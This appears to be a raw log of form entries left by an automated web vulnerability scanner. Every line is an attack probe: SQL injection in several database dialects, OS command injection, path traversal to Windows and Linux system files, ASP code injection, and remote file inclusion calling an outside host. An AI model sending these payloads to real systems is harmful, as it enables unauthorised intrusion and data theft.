-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
'& SET /A 0xFFF9999-2 &
1)) WAITFOR DELAY '0:0:25'--
1 AND 'NS='ss 3 netsparker@example.com
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' 3 netsparker@example.com
'& SET /A 0xFFF9999-2 & 3 netsparker@example.com
1)) WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
' OR 'ns'='ns 3 netsparker@example.com
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
& SET /A 0xFFF9999-2 &
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
-1 OR 17-7=10 3 netsparker@example.com
"& ping -n 25 127.0.0.1 &
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+" 3 netsparker@example.com
& SET /A 0xFFF9999-2 & 3 netsparker@example.com
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
1 OR X='ss 3 netsparker@example.com
"& ping -n 25 127.0.0.1 & 3 netsparker@example.com
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
SET /A 0xFFF9999-2 &
' OR '1'='1 3 netsparker@example.com
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
'& ping -n 25 127.0.0.1 &
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) 3 netsparker@example.com
' OR '1'='1 3 netsparker@example.com
SET /A 0xFFF9999-2 & 3 netsparker@example.com
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
'& ping -n 25 127.0.0.1 & 3 netsparker@example.com
Smith -1 OR 1=1 netsparker@example.com
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
"&expr 268409241 - 2 &"
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
& ping -n 25 127.0.0.1 &
Smith -1 OR 1=1 netsparker@example.com
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) 3 netsparker@example.com
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
& ping -n 25 127.0.0.1 & 3 netsparker@example.com
Smith ' netsparker@example.com
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
"&expr 268409241 - 2 &" 3 netsparker@example.com
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
ping -n 25 127.0.0.1 &
Smith NS1NO netsparker@example.com
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' 3 netsparker@example.com
'&expr 268409241 - 2 &'
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
ping -n 25 127.0.0.1 & 3 netsparker@example.com
Smith 1 AND 'NS='ss netsparker@example.com
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
'&expr 268409241 - 2 &' 3 netsparker@example.com
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
"&ping -c 25 127.0.0.1 &"
Smith ' OR 'ns'='ns netsparker@example.com
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) 3 netsparker@example.com
&expr 268409241 - 2 &
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 3 netsparker@example.com
"&ping -c 25 127.0.0.1 &" 3 netsparker@example.com
Smith -1 OR 17-7=10 netsparker@example.com
NSFTW
&expr 268409241 - 2 & 3 netsparker@example.com
((select sleep(25)))a-- 1
Smith 1 OR X='ss netsparker@example.com
'&ping -c 25 127.0.0.1 &'
'"--> 3 netsparker@example.com
NSFTW 3 netsparker@example.com
expr 268409241 - 2 &
((select sleep(25)))a-- 1 3 netsparker@example.com
Smith ' OR '1'='1 netsparker@example.com
'&ping -c 25 127.0.0.1 &' 3 netsparker@example.com
'+NSFTW+'
expr 268409241 - 2 & 3 netsparker@example.com
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
Smith ' OR '1'='1 netsparker@example.com
&ping -c 25 127.0.0.1 &
'+NSFTW+' 3 netsparker@example.com
SET /A 0xFFF9999-2
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) 3 netsparker@example.com
&ping -c 25 127.0.0.1 & 3 netsparker@example.com
Smith -1 OR 1=1 netsparker@example.com
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
SET /A 0xFFF9999-2 3 netsparker@example.com
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
Smith -1 OR 1=1 netsparker@example.com
ping -c 25 127.0.0.1 &
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) 3 netsparker@example.com
expr 268409241 - 2
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' 3 netsparker@example.com
Smith ' netsparker@example.com
ping -c 25 127.0.0.1 & 3 netsparker@example.com
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
expr 268409241 - 2 3 netsparker@example.com
Smith NS1NO netsparker@example.com
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
ping -n 25 127.0.0.1
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' 3 netsparker@example.com
268409239
Smith 1 AND 'NS='ss netsparker@example.com
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 3 netsparker@example.com
ping -n 25 127.0.0.1 3 netsparker@example.com
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
268409239 3 netsparker@example.com
';SELECT pg_sleep(25)--
Smith ' OR 'ns'='ns netsparker@example.com
ping -c 25 127.0.0.1
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1 3 netsparker@example.com
"& SET /A 0xFFF9999-2 &
';SELECT pg_sleep(25)-- 3 netsparker@example.com
ping -c 25 127.0.0.1 3 netsparker@example.com
Smith -1 OR 17-7=10 netsparker@example.com
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
Smith "& SET /A 0xFFF9999-2 & netsparker@example.com
1;SELECT pg_sleep(25)--
Smith 1 OR X='ss netsparker@example.com
"& ping -n 25 127.0.0.1 &
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1 3 netsparker@example.com
'& SET /A 0xFFF9999-2 &
1;SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith ' OR '1'='1 netsparker@example.com
Smith "& ping -n 25 127.0.0.1 & netsparker@example.com
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
Smith '& SET /A 0xFFF9999-2 & netsparker@example.com
SELECT pg_sleep(25)--
Smith ' OR '1'='1 netsparker@example.com
'& ping -n 25 127.0.0.1 &
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) 3 netsparker@example.com
& SET /A 0xFFF9999-2 &
SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith 3 -1 OR 1=1
Smith '& ping -n 25 127.0.0.1 & netsparker@example.com
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
Smith & SET /A 0xFFF9999-2 & netsparker@example.com
1);SELECT pg_sleep(25)--
Smith 3 -1 OR 1=1
& ping -n 25 127.0.0.1 &
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' 3 netsparker@example.com
SET /A 0xFFF9999-2 &
1);SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith 3 '
Smith & ping -n 25 127.0.0.1 & netsparker@example.com
%27
Smith SET /A 0xFFF9999-2 & netsparker@example.com
');SELECT pg_sleep(25)--
Smith 3 NS1NO
ping -n 25 127.0.0.1 &
Smith %27 netsparker@example.com
"&expr 268409241 - 2 &"
');SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith 3 1 AND 'NS='ss
Smith ping -n 25 127.0.0.1 & netsparker@example.com
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
Smith "&expr 268409241 - 2 &" netsparker@example.com
'));SELECT pg_sleep(25)--
Smith 3 ' OR 'ns'='ns
"&ping -c 25 127.0.0.1 &"
Smith (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) netsparker@example.com
'&expr 268409241 - 2 &'
'));SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith 3 -1 OR 17-7=10
Smith "&ping -c 25 127.0.0.1 &" netsparker@example.com
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
Smith '&expr 268409241 - 2 &' netsparker@example.com
1));SELECT pg_sleep(25)--
Smith 3 1 OR X='ss
'&ping -c 25 127.0.0.1 &'
'"-->
Smith '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' netsparker@example.com
&expr 268409241 - 2 &
1));SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith 3 ' OR '1'='1
Smith '&ping -c 25 127.0.0.1 &' netsparker@example.com
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
Smith &expr 268409241 - 2 & netsparker@example.com
((SELECT 1 FROM (SELECT SLEEP(25))A))
Smith 3 ' OR '1'='1
&ping -c 25 127.0.0.1 &
Smith convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) netsparker@example.com
expr 268409241 - 2 &
((SELECT 1 FROM (SELECT SLEEP(25))A)) 3 netsparker@example.com
Smith 3 -1 OR 1=1
Smith &ping -c 25 127.0.0.1 & netsparker@example.com
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
Smith expr 268409241 - 2 & netsparker@example.com
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
Smith 3 -1 OR 1=1
ping -c 25 127.0.0.1 &
Smith '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+' netsparker@example.com
SET /A 0xFFF9999-2
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+' 3 netsparker@example.com
Smith 3 '
Smith ping -c 25 127.0.0.1 & netsparker@example.com
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
Smith SET /A 0xFFF9999-2 netsparker@example.com
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
Smith 3 NS1NO
ping -n 25 127.0.0.1
Smith 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=' netsparker@example.com
expr 268409241 - 2
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' 3 netsparker@example.com
Smith 3 1 AND 'NS='ss
Smith ping -n 25 127.0.0.1 netsparker@example.com
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
Smith expr 268409241 - 2 netsparker@example.com
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
Smith 3 ' OR 'ns'='ns
ping -c 25 127.0.0.1
Smith -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) netsparker@example.com
268409239
Smith 3 -1 OR 17-7=10
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) 3 netsparker@example.com
Smith ping -c 25 127.0.0.1 netsparker@example.com
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
Smith 3 1 OR X='ss
Smith 268409239 netsparker@example.com
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
"& ping -n 25 127.0.0.1 &
Smith -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' netsparker@example.com
Smith 3 ' OR '1'='1
"& SET /A 0xFFF9999-2 &
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" 3 netsparker@example.com
Smith 3 "& ping -n 25 127.0.0.1 &
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
Smith 3 ' OR '1'='1
Smith 3 "& SET /A 0xFFF9999-2 &
' WAITFOR DELAY '0:0:25'--
'& ping -n 25 127.0.0.1 &
Smith -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+" netsparker@example.com
/../../../../../../../../../../boot.ini
'& SET /A 0xFFF9999-2 &
Smith ' WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith 3 '& ping -n 25 127.0.0.1 &
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
/../../../../../../../../../../boot.ini 3 netsparker@example.com
Smith 3 '& SET /A 0xFFF9999-2 &
1 WAITFOR DELAY '0:0:25'--
& ping -n 25 127.0.0.1 &
Smith (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) netsparker@example.com
/../../../../../../../../../../web.config
& SET /A 0xFFF9999-2 &
Smith 1 WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith 3 & ping -n 25 127.0.0.1 &
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
/../../../../../../../../../../web.config 3 netsparker@example.com
Smith 3 & SET /A 0xFFF9999-2 &
WAITFOR DELAY '0:0:25'--
ping -n 25 127.0.0.1 &
Smith cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) netsparker@example.com
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
SET /A 0xFFF9999-2 &
Smith WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith 3 ping -n 25 127.0.0.1 &
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini 3 netsparker@example.com
Smith 3 SET /A 0xFFF9999-2 &
1) WAITFOR DELAY '0:0:25'--
"&ping -c 25 127.0.0.1 &"
Smith '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' netsparker@example.com
/../../../../../../../../../../boot.ini.cgi
"&expr 268409241 - 2 &"
Smith 1) WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith 3 "&ping -c 25 127.0.0.1 &"
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
/../../../../../../../../../../boot.ini.cgi 3 netsparker@example.com
Smith 3 "&expr 268409241 - 2 &"
Smith '"--> netsparker@example.com
') WAITFOR DELAY '0:0:25'--
'&ping -c 25 127.0.0.1 &'
Smith (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) netsparker@example.com
/../../../../../../../../../../boot.ini
'&expr 268409241 - 2 &'
Smith ') WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith 3 '&ping -c 25 127.0.0.1 &'
NSFTW
/../../../../../../../../../../boot.ini 3 netsparker@example.com
Smith 3 '&expr 268409241 - 2 &'
')) WAITFOR DELAY '0:0:25'--
&ping -c 25 127.0.0.1 &
Smith NSFTW netsparker@example.com
file:/windows/win.ini
&expr 268409241 - 2 &
Smith ')) WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith 3 &ping -c 25 127.0.0.1 &
'+NSFTW+'
file:/windows/win.ini 3 netsparker@example.com
Smith 3 &expr 268409241 - 2 &
1)) WAITFOR DELAY '0:0:25'--
ping -c 25 127.0.0.1 &
Smith '+NSFTW+' netsparker@example.com
file:/boot.ini
expr 268409241 - 2 &
Smith 1)) WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith 3 ping -c 25 127.0.0.1 &
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
file:/boot.ini 3 netsparker@example.com
Smith 3 expr 268409241 - 2 &
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
ping -n 25 127.0.0.1
Smith (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) netsparker@example.com
/../../../../../../../../../../windows/win.ini
SET /A 0xFFF9999-2
Smith 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
Smith 3 ping -n 25 127.0.0.1
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
/../../../../../../../../../../windows/win.ini 3 netsparker@example.com
Smith 3 SET /A 0xFFF9999-2
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
ping -c 25 127.0.0.1
Smith -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' netsparker@example.com
/../../../../../../../../../../windows/win.ini.cgi
expr 268409241 - 2
Smith 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
Smith 3 ping -c 25 127.0.0.1
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
/../../../../../../../../../../windows/win.ini.cgi 3 netsparker@example.com
Smith 3 expr 268409241 - 2
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1 netsparker@example.com
hTTp://r87.com/n
c:\windows\win.ini
268409239
Smith 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
c:\windows\win.ini 3 netsparker@example.com
hTTp://r87.com/n 3 netsparker@example.com
Smith 3 268409239
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
Smith 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1 netsparker@example.com
c:\boot.ini
http://r87.com/n?.cgi
Smith syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- netsparker@example.com
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
c:\boot.ini 3 netsparker@example.com
http://r87.com/n?.cgi 3 netsparker@example.com
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
Smith 3 netsparker@example.com
Smith (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) netsparker@example.com
/../../../../../../../../../../windows/iis6.log
http://r87.com/n?.cgi
Smith -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 netsparker@example.com
response.write(268409241-22)'
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
/../../../../../../../../../../windows/iis6.log 3 netsparker@example.com
http://r87.com/n?.cgi 3 netsparker@example.com
((select sleep(25)))a-- 1
response.write(268409241-22)' 3 netsparker@example.com
Smith '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' netsparker@example.com
/../../../../../../../../../../proc/self/fd/2
php://filter//resource=http://r87.com/n?.cgi
Smith ((select sleep(25)))a-- 1 netsparker@example.com
+response.write(268409241-22)'
%27
/../../../../../../../../../../proc/self/fd/2 3 netsparker@example.com
php://filter//resource=http://r87.com/n?.cgi 3 netsparker@example.com
